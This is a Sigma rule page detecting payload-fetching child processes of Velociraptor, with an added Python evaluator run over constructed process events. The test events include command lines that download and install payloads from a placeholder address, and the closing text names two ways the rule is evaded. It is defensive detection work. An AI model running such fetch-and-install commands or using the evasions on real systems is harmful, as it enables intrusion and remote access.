Sample rules
Suspicious Velociraptor Child Process
- source: sigma
- techniques:
- t1219
Description
Detects a child process of the Velociraptor DFIR tool that installs or fetches additional payloads: msiexec installing from a URL, PowerShell downloading content, or a VS Code tunnel being started. This pattern was seen in a campaign where Velociraptor was abused for remote access and to stage further attacks.
Detection logic
detection:
    selection_parent:
        ParentImage|endswith: '\Velociraptor.exe'
    selection_child_msiexec:
        CommandLine|contains|all:
            - 'msiexec'
            - '/i'
            - 'http'
    selection_child_powershell:
        Image|endswith:
            - '\powershell.exe'
            - '\powershell_ise.exe'
            - '\pwsh.exe'
        CommandLine|contains:
            - 'Invoke-WebRequest '
            - 'IWR '
            - '.DownloadFile'
            - '.DownloadString'
    selection_child_vscode_tunnel:
        CommandLine|contains|all:
            - 'code.exe'
            - 'tunnel'
            - '--accept-server-license-terms'
    condition: selection_parent and 1 of selection_child_*
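The rule's logic run over sample process-creation events, as an added example that is not part of the Sigma rule or its project: the selections are transcribed from the rule into dictionaries, the `endswith`, `contains` and `contains|all` modifiers are implemented with Sigma's default case-insensitive matching, and the condition `selection_parent and 1 of selection_child_*` is evaluated. The helper names (`matched_children`, `rule_matches`) and the events (including the 198.51.100.7 documentation-range address) are constructed for this example.

```python
# Added example, not the rule's own code: a minimal evaluator for this
# rule's detection block, run against constructed process-creation events.

# Selections transcribed from the rule. Within one selection every field
# must match (AND); a list of values under one field is OR'd unless the
# field carries the |all modifier.
SELECTION_PARENT = {"ParentImage|endswith": [r"\Velociraptor.exe"]}
SELECTION_CHILD = {
    "msiexec": {"CommandLine|contains|all": ["msiexec", "/i", "http"]},
    "powershell": {
        "Image|endswith": [r"\powershell.exe", r"\powershell_ise.exe", r"\pwsh.exe"],
        "CommandLine|contains": ["Invoke-WebRequest ", "IWR ", ".DownloadFile", ".DownloadString"],
    },
    "vscode_tunnel": {"CommandLine|contains|all": ["code.exe", "tunnel", "--accept-server-license-terms"]},
}


def _field_matches(event, key, values):
    """Evaluate one 'Field|modifier' entry against an event (case-insensitive)."""
    field, *mods = key.split("|")
    actual = str(event.get(field, "")).lower()
    wanted = [v.lower() for v in values]
    if "endswith" in mods:
        return any(actual.endswith(v) for v in wanted)
    if "contains" in mods:
        if "all" in mods:
            return all(v in actual for v in wanted)
        return any(v in actual for v in wanted)
    return actual in wanted  # plain equality, no modifier


def selection_matches(event, selection):
    """All fields of a selection must match."""
    return all(_field_matches(event, key, vals) for key, vals in selection.items())


def matched_children(event):
    """Names of selection_child_* blocks that fire, or [] if the parent check fails."""
    if not selection_matches(event, SELECTION_PARENT):
        return []
    return [name for name, sel in SELECTION_CHILD.items() if selection_matches(event, sel)]


def rule_matches(event):
    """condition: selection_parent and 1 of selection_child_*"""
    return bool(matched_children(event))


# Constructed events (hypothetical paths and command lines).
VELO = r"C:\Program Files\Velociraptor\Velociraptor.exe"
EVENTS = [
    # 1: PowerShell web request under Velociraptor -> powershell selection
    {"ParentImage": VELO, "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": 'pwsh.exe -NoProfile -c "IWR http://198.51.100.7/a.ps1 -OutFile a.ps1"'},
    # 2: msiexec installing from a URL -> msiexec selection
    {"ParentImage": VELO, "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec.exe /i http://198.51.100.7/agent.msi /qn"},
    # 3: VS Code tunnel -> vscode_tunnel selection
    {"ParentImage": VELO, "Image": r"C:\Users\Public\code.exe",
     "CommandLine": "code.exe tunnel --accept-server-license-terms --name host1"},
    # 4: benign-looking child under Velociraptor, no download keyword -> no match
    {"ParentImage": VELO, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    # 5: same download keyword but parent is Explorer -> no match
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Invoke-WebRequest http://198.51.100.7/x"},
    # 6: download keyword present but the child Image is cmd.exe, so the
    #    powershell selection's Image field fails -> no match
    {"ParentImage": VELO, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -c (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s')"},
]


def evaluate_all(events=EVENTS):
    """Return the matched child selections for each event, in order."""
    return [matched_children(e) for e in events]


if __name__ == "__main__":
    for event, hits in zip(EVENTS, evaluate_all()):
        print(f"{'ALERT' if hits else 'ok   '} {hits} {event['CommandLine']}")
```

Event 6 is the case worth noting: the PowerShell selection requires both the download keyword in the command line and a PowerShell image, so a one-hop launcher such as `cmd.exe /c powershell ...` is not matched at the cmd.exe event, and by the time powershell.exe itself starts its parent is cmd.exe rather than Velociraptor.exe. Likewise the parent check is on the image name only, so a renamed Velociraptor binary does not satisfy `selection_parent`.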